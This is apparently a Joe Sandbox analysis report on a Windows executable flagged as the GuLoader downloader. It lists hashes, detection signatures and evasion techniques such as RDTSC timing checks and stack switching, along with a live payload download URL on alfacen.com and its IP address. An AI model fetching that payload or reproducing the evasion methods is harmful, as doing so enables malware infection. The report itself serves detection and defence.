Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
450707124374000811.exe

Overview

General Information

Sample name:450707124374000811.exe
Analysis ID:1538185
MD5:22aeab62009aaa9073b3159d7da1195e
SHA1:602dd47b6910a522be90fc47d10d5c26a836a01a
SHA256:1fc195e3937e7c7d9ca78f9c39f8997d5ed98fe1c608ad5c7b4a01dc24ddd967
Tags:exeuser-Racco42
Infos:

Detection

GuLoader
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected GuLoader
AI detected suspicious sample
Opens the same file many times (likely Sandbox evasion)
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Abnormal high CPU Usage
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • 450707124374000811.exe (PID: 6640 cmdline: "C:\Users\user\Desktop\450707124374000811.exe" MD5: 22AEAB62009AAA9073B3159D7DA1195E)
    • 450707124374000811.exe (PID: 1060 cmdline: "C:\Users\user\Desktop\450707124374000811.exe" MD5: 22AEAB62009AAA9073B3159D7DA1195E)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.2468313249.0000000002BF8000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

    Sigma Signatures

    No Sigma rule has matched

    Suricata Signatures

    No Suricata rule has matched

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Antivirus / Scanner detection for submitted sample
    Source: 450707124374000811.exeAvira: detected
    Multi AV Scanner detection for submitted file
    Source: 450707124374000811.exeReversingLabs: Detection: 44%
    AI detected suspicious sample
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
    Source: 450707124374000811.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
    Source: unknownHTTPS traffic detected: 193.107.36.30:443 -> 192.168.2.4:49846 version: TLS 1.2
    Source: 450707124374000811.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: Binary string: mshtml.pdb source: 450707124374000811.exe, 00000004.00000001.2467393777.0000000000649000.00000020.00000001.01000000.00000006.sdmp
    Source: Binary string: wntdll.pdbUGP source: 450707124374000811.exe, 00000004.00000003.2862772211.000000003559E000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000003.2864836378.0000000035746000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmp
    Source: Binary string: wntdll.pdb source: 450707124374000811.exe, 450707124374000811.exe, 00000004.00000003.2862772211.000000003559E000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000003.2864836378.0000000035746000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmp
    Source: Binary string: mshtml.pdbUGP source: 450707124374000811.exe, 00000004.00000001.2467393777.0000000000649000.00000020.00000001.01000000.00000006.sdmp
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 0_2_004065C5 FindFirstFileW,FindClose,0_2_004065C5
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 0_2_00405990 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405990
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 0_2_00402862 FindFirstFileW,0_2_00402862
    Source: Joe Sandbox ViewIP Address: 193.107.36.30 193.107.36.30
    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /GZgWeuQ77.bin HTTP/1.1User-Agent: 5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: alfacen.comCache-Control: no-cache
    Source: global trafficDNS traffic detected: DNS query: alfacen.com
    Source: 450707124374000811.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
    Source: 450707124374000811.exe, 00000004.00000001.2467393777.0000000000649000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.ftp.ftp://ftp.gopher.
    Source: 450707124374000811.exe, 00000004.00000001.2467393777.00000000005F2000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
    Source: 450707124374000811.exe, 00000004.00000001.2467393777.00000000005F2000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
    Source: 450707124374000811.exe, 00000004.00000003.2863513431.0000000005653000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000003.2863552565.000000000565B000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000002.2893461136.000000000565C000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000003.2863258714.000000000565B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://alfacen.com/
    Source: 450707124374000811.exe, 00000004.00000003.2863513431.0000000005638000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000003.2863275238.0000000005638000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000003.2863513431.0000000005653000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000003.2863552565.000000000565B000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000002.2893461136.000000000565C000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000002.2914434023.0000000034D30000.00000004.00001000.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000002.2893414813.0000000005639000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000003.2863258714.000000000565B000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000002.2893349281.000000000562B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://alfacen.com/GZgWeuQ77.bin
    Source: 450707124374000811.exe, 00000004.00000003.2863513431.0000000005638000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000003.2863275238.0000000005638000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000002.2893414813.0000000005639000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://alfacen.com/GZgWeuQ77.bine
    Source: 450707124374000811.exe, 00000004.00000003.2863513431.0000000005638000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000003.2863275238.0000000005638000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000002.2893414813.0000000005639000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://alfacen.com/GZgWeuQ77.bine/Q
    Source: 450707124374000811.exe, 00000004.00000003.2863513431.0000000005638000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000003.2863275238.0000000005638000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000002.2893414813.0000000005639000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://alfacen.com/GZgWeuQ77.binf
    Source: 450707124374000811.exe, 00000004.00000001.2467393777.0000000000649000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
    Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
    Source: unknownHTTPS traffic detected: 193.107.36.30:443 -> 192.168.2.4:49846 version: TLS 1.2
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 0_2_00405425 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405425
    Source: C:\Users\user\Desktop\450707124374000811.exeProcess Stats: CPU usage > 49%
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359635C0 NtCreateMutant,LdrInitializeThunk,4_2_359635C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35962DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_35962DF0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35963090 NtSetValueKey,4_2_35963090
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35963010 NtOpenDirectoryObject,4_2_35963010
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 0_2_00403373 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403373
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 0_2_00404C620_2_00404C62
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 0_2_00406ADD0_2_00406ADD
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 0_2_004072B40_2_004072B4
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359CD5B04_2_359CD5B0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359F95C34_2_359F95C3
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359E75714_2_359E7571
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359EF43F4_2_359EF43F
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359214604_2_35921460
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359EF7B04_2_359EF7B0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359E16CC4_2_359E16CC
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359756304_2_35975630
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593B1B04_2_3593B1B0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3591F1724_2_3591F172
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359FB16B4_2_359FB16B
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3596516C4_2_3596516C
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359DF0CC4_2_359DF0CC
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359370C04_2_359370C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359E70E94_2_359E70E9
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359EF0E04_2_359EF0E0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3597739A4_2_3597739A
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359E132D4_2_359E132D
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3591D34C4_2_3591D34C
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359352A04_2_359352A0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3594B2C04_2_3594B2C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3594D2F04_2_3594D2F0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359D12ED4_2_359D12ED
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: String function: 3591B970 appears 96 times
    Source: 450707124374000811.exeStatic PE information: Resource name: RT_VERSION type: Intel 80386 COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
    Source: 450707124374000811.exe, 00000004.00000002.2914801350.0000000035BC1000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 450707124374000811.exe
    Source: 450707124374000811.exe, 00000004.00000003.2862772211.00000000356C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 450707124374000811.exe
    Source: 450707124374000811.exe, 00000004.00000003.2864836378.0000000035873000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 450707124374000811.exe
    Source: 450707124374000811.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
    Source: classification engineClassification label: mal80.troj.evad.winEXE@2/8@1/1
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 0_2_00403373 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403373
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 0_2_004046E6 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004046E6
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 0_2_004020FE CoCreateInstance,0_2_004020FE
    Source: C:\Users\user\Desktop\450707124374000811.exeFile created: C:\Users\user\AppData\Roaming\pechayJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeFile created: C:\Users\user\AppData\Local\Temp\nsfA7DB.tmpJump to behavior
    Source: 450707124374000811.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\450707124374000811.exeFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: 450707124374000811.exeReversingLabs: Detection: 44%
    Source: C:\Users\user\Desktop\450707124374000811.exeFile read: C:\Users\user\Desktop\450707124374000811.exeJump to behavior
    Source: unknownProcess created: C:\Users\user\Desktop\450707124374000811.exe "C:\Users\user\Desktop\450707124374000811.exe"
    Source: C:\Users\user\Desktop\450707124374000811.exeProcess created: C:\Users\user\Desktop\450707124374000811.exe "C:\Users\user\Desktop\450707124374000811.exe"
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: dwmapi.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: oleacc.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: shfolder.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: riched20.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: usp10.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: msls31.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: powrprof.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: wkscli.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: umpdc.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
    Source: 450707124374000811.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: Binary string: mshtml.pdb source: 450707124374000811.exe, 00000004.00000001.2467393777.0000000000649000.00000020.00000001.01000000.00000006.sdmp
    Source: Binary string: wntdll.pdbUGP source: 450707124374000811.exe, 00000004.00000003.2862772211.000000003559E000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000003.2864836378.0000000035746000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmp
    Source: Binary string: wntdll.pdb source: 450707124374000811.exe, 450707124374000811.exe, 00000004.00000003.2862772211.000000003559E000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000003.2864836378.0000000035746000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmp
    Source: Binary string: mshtml.pdbUGP source: 450707124374000811.exe, 00000004.00000001.2467393777.0000000000649000.00000020.00000001.01000000.00000006.sdmp

    Data Obfuscation

    barindex
    Yara detected GuLoader
    Source: Yara matchFile source: 00000000.00000002.2468313249.0000000002BF8000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_10001B18
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 0_2_10002DE0 push eax; ret 0_2_10002E0E
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_358F1368 push eax; iretd 4_2_358F1369
    Source: C:\Users\user\Desktop\450707124374000811.exeFile created: C:\Users\user\AppData\Local\Temp\nsqA869.tmp\System.dllJump to dropped file
    Source: C:\Users\user\Desktop\450707124374000811.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

    Malware Analysis System Evasion

    barindex
    Opens the same file many times (likely Sandbox evasion)
    Source: C:\Users\user\Desktop\450707124374000811.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Saddukisk233\centerleder.ini count: 45722Jump to behavior
    Switches to a custom stack to bypass stack traces
    Source: C:\Users\user\Desktop\450707124374000811.exeAPI/Special instruction interceptor: Address: 31291AD
    Source: C:\Users\user\Desktop\450707124374000811.exeAPI/Special instruction interceptor: Address: 1D091AD
    Tries to detect virtualization through RDTSC time measurements
    Source: C:\Users\user\Desktop\450707124374000811.exeRDTSC instruction interceptor: First address: 30EC9BB second address: 30EC9BB instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F8700C58778h 0x00000006 inc ebp 0x00000007 inc ebx 0x00000008 test al, dl 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\450707124374000811.exeRDTSC instruction interceptor: First address: 1CCC9BB second address: 1CCC9BB instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F8700D7BE88h 0x00000006 inc ebp 0x00000007 inc ebx 0x00000008 test al, dl 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3599D1C0 rdtsc 4_2_3599D1C0
    Source: C:\Users\user\Desktop\450707124374000811.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsqA869.tmp\System.dllJump to dropped file
    Source: C:\Users\user\Desktop\450707124374000811.exeAPI coverage: 0.4 %
    Source: C:\Users\user\Desktop\450707124374000811.exe TID: 796Thread sleep time: -30000s >= -30000sJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 0_2_004065C5 FindFirstFileW,FindClose,0_2_004065C5
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 0_2_00405990 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405990
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 0_2_00402862 FindFirstFileW,0_2_00402862
    Source: 450707124374000811.exe, 00000004.00000003.2863443830.000000000566C000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000003.2863224736.000000000566C000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000002.2893481986.000000000566C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWq
    Source: 450707124374000811.exe, 00000004.00000003.2863513431.0000000005638000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000003.2863275238.0000000005638000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000003.2863443830.000000000566C000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000003.2863224736.000000000566C000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000002.2893481986.000000000566C000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000002.2893414813.0000000005639000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: C:\Users\user\Desktop\450707124374000811.exeAPI call chain: ExitProcess graph end nodegraph_0-4600
    Source: C:\Users\user\Desktop\450707124374000811.exeAPI call chain: ExitProcess graph end nodegraph_0-4604
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3599D1C0 rdtsc 4_2_3599D1C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359635C0 NtCreateMutant,LdrInitializeThunk,4_2_359635C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_10001B18
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359AB594 mov eax, dword ptr fs:[00000030h]4_2_359AB594
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359AB594 mov eax, dword ptr fs:[00000030h]4_2_359AB594
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3591758F mov eax, dword ptr fs:[00000030h]4_2_3591758F
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3591758F mov eax, dword ptr fs:[00000030h]4_2_3591758F
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3591758F mov eax, dword ptr fs:[00000030h]4_2_3591758F
